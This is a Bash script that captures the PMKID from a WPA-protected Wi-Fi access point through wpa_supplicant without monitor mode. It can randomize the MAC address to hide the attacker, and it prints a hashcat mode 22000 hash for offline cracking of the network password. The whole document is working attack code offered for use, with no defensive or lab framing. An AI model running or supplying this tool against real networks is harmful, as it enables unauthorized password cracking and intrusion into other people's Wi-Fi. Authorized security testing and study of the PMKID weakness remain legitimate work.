Simple Bash script to capture PMKID value from a WPA-protected Wi-Fi access point using only wpa_supplicant without switching to monitor mode

capture_pmkid.sh

#!/bin/bash
set -e

help() {
cat << EOF
Usage: $0 [-r|--randomize-macaddr] <wlan interface> <AP ESSID>

Capture PMKID value from a WPA-protected Wi-Fi access point.

Options:
  -r, --randomize-macaddr    Randomize MAC address of the WLAN interface before capture (GNU macchanger is required)
  -h, --help                 Show this help message

Example:
$0 wlan0 MyWiFi
EOF
}


do_randomize_macaddr=0
if [ "$1" = '-r' ] || [ "$1" = '--randomize-macaddr' ]; then
  do_randomize_macaddr=1
  shift
elif [ "$1" = '-h' ] || [ "$1" = '--help' ]; then
  help
  exit 0
fi

if [ $# -lt 2 ]; then
  echo "Error: positional arguments is required."
  help
  exit 0
fi

IFACE=$1
ESSID="$2"

ESSID_HEX=$(echo -n "$ESSID" | xxd -p -u | tr '[:upper:]' '[:lower:]')
PASSWORD=$(tr -dc A-Za-z0-9 < /dev/urandom | head -c 8)
ORIGINAL_MACADDR=$(cat /sys/class/net/$IFACE/address)

if [ $do_randomize_macaddr -eq 1 ]; then
  echo "Randomizing MAC address..."
  ip link set $IFACE down
  macchanger -r $IFACE
  trap "echo 'Restoring MAC address...'; ip link set $IFACE down; macchanger --mac=$ORIGINAL_MACADDR $IFACE" EXIT
fi

echo "Initiating connection with access point '$ESSID' with password '$PASSWORD'..."
MAC_CLIENT=$(cat /sys/class/net/$IFACE/address | tr -d ':')
wpas_output=$(wpa_passphrase "$ESSID" $PASSWORD | wpa_supplicant -i $IFACE -dd -c /dev/stdin | grep -e "selected BSS" -e "PMKID from" -m 2)

MAC_AP=$(echo -n "$wpas_output" | grep -Eo '([0-9a-f]{2}:){5}[0-9a-f]{2}' -m 1)
PMKID=$(echo -n "$wpas_output" | grep -Eo '([0-9a-f]{2} ){15}[0-9a-f]{2}' -m 1 | tr -d ' ')
if [ -z "$MAC_AP" ] || [ -z "$PMKID" ]; then
  echo "Failed to capture PMKID. This AP probably does not emit PMKID.";
  exit 1;
fi

echo "Captured PMKID from $MAC_AP ('$ESSID'): $PMKID"
echo "Hashcat 22000 mode hash:"
echo "WPA*01*$PMKID*$(echo -n $MAC_AP | tr -d ':')*$MAC_CLIENT*$ESSID_HEX***01"
echo